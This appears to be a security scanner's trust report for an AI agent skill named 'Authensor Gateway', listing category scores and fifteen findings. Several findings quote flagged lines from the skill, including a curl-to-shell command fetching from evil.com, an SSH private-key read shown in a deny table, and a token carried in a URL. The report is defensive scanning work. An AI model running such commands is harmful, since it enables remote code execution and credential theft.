Skip to content
← Registry
Trust Report

Authensor Gateway

66
SUSPICIOUS
Format: openclawScanner: v0.8.0Duration: 22msScanned: 10d ago · Apr 30, 10:54 AMSource →
Open community →Automate with the API →Join the discussion →Jump to findings →
Embed this badge
AgentVerus SUSPICIOUS 66AgentVerus SUSPICIOUS 66AgentVerus SUSPICIOUS 66
[![AgentVerus](https://agentverus.ai/api/v1/skill/0deaa080-0c6d-4f61-a957-66e502c0588b/badge)](https://agentverus.ai/skill/0deaa080-0c6d-4f61-a957-66e502c0588b)
Community Discussion

Community Comments

Public comments are the active feedback surface on skill reports right now. Use them to share implementation notes, edge cases, and operator context.

0 comments

Sign in to comment on this skill

No comments yet. Be the first to share your thoughts.

Continue the workflow

Keep this report moving through the activation path: rescan from the submit flow, capture real-world interactions, and wire the trust endpoint into your automation.

Rescan this skill →Record an interaction →Open comments →Automate this report →
https://agentverus.ai/api/v1/skill/0deaa080-0c6d-4f61-a957-66e502c0588b/trust
Personalized next commands

Use these current-skill command blocks to keep this exact report moving through your workflow.

Record an interaction
curl -X POST https://agentverus.ai/api/v1/interactions \
  -H "Authorization: Bearer at_your_api_key" \
  -H "Content-Type: application/json" \
  -d '{"agentPlatform":"openclaw","skillId":"0deaa080-0c6d-4f61-a957-66e502c0588b","interactedAt":"2026-03-15T12:00:00Z","outcome":"success"}'
Fetch trust JSON
curl https://agentverus.ai/api/v1/skill/0deaa080-0c6d-4f61-a957-66e502c0588b/trust

Category Scores

41
Permissions
84
Injection
5
Dependencies
57
Behavioral
85
Content
100
Code Safety

Findings (15)

mediumSuspicious install pattern: download and execute from remote URL-8

The skill instructs users to download and execute code from a remote URL, a common supply-chain attack vector.

curl https://evil.com/payload \| sh

Remove curl-pipe-to-shell patterns. Provide dependencies through safe, verifiable channels.

behavioralASST-02
highCapability contract mismatch: inferred credential access is not declared-15

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: access secrets

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-05
highCapability contract mismatch: inferred command execution is not declared-12

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: exec

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
highPotential data exfiltration: skill reads credentials and sends them to external endpoints-25

The skill contains patterns that actively read credential files and send data to external endpoints, suggesting a possible data exfiltration flow.

Active credential reading and suspicious network exfiltration patterns both present

Separate credential access from network operations. If both are needed, declare them explicitly and justify.

behavioralASST-06
highCapability contract mismatch: inferred browser auth/session capabilities are not declared-10

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior. Related auth/profile context: - related auth/profile capability-contract signals — Capability contract mismatch: inferred network access is not declared

Content pattern: ?token=

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
mediumCapability contract mismatch: inferred file write is not declared-8

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: write files

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
mediumCapability contract mismatch: inferred package bootstrap is not declared-8

The scanner inferred a risky capability from the skill content/metadata, but no matching declaration was found. Add a declaration with a clear justification, or remove the behavior.

Content pattern: npm install

Declare this capability explicitly in frontmatter permissions with a specific justification, or remove the risky behavior.

permissionsASST-03
mediumCredential access detected (inside code block)-8

Found credential access pattern: "Read ~/.ssh/id_rsa"

| `Read ~/.ssh/id_rsa` | `secrets.access` | **Deny** | Sensitive path detected |

Remove references to credentials and secrets. Skills should never access sensitive authentication data.

injectionASST-05
mediumCredential access detected (inside code block)-8

Found credential access pattern: "~/.ssh/id_rsa"

| `Read ~/.ssh/id_rsa` | `secrets.access` | **Deny** | Sensitive path detected |

Remove references to credentials and secrets. Skills should never access sensitive authentication data.

injectionASST-05
mediumDownload-and-execute pattern detected (inside code block)-8

The skill contains a download-and-execute pattern inside a code block. Verify the URL is trustworthy.

curl https://evil.com/payload \| sh

Pin the installer to a specific version or hash. Consider bundling dependencies instead.

dependenciesASST-04
mediumCredential-bearing URL parameter-8

The skill includes a URL whose query parameters look like they carry cookies, auth state, or token material. URLs are commonly logged and replayed, so credential-bearing parameters expand the dependency risk surface even on first-party domains. Related auth/profile context: - overlapping signals from the same local context — Unknown external reference

https://api.example.com/data?token=secret`

Avoid query-string credential transport. Prefer secure headers, dedicated cookie APIs, or other mechanisms that do not expose bearer material in URLs.

dependenciesASST-04
mediumPackage bootstrap execution detected (inside code block)-5

Found package bootstrap execution pattern: "npm install"

| `Bash "npm install lodash"` | `code.exec` | **Require approval** | Installing packages needs your OK |

Surface package bootstrap commands for review. Ephemeral package execution and install-time dependency pulls increase supply-chain risk, especially when versions are not pinned or provenance is unclear.

behavioralASST-04
lowState persistence detected-5

Found state persistence pattern: "write file"

- **High-risk actions** (write files, run commands, network requests) — require your approval

If state persistence is needed, document what data is stored and where. Allow users to review stored data.

behavioralASST-09
lowMissing or insufficient description-5

The skill lacks a meaningful description, making it difficult to assess its purpose.

No description found

Add a clear, detailed description of what the skill does and what it needs access to.

contentASST-09
infoSafety boundaries defined

The skill includes explicit safety boundaries defining what it should NOT do.

Safety boundary patterns detected in content

Keep these safety boundaries. They improve trust.

contentASST-09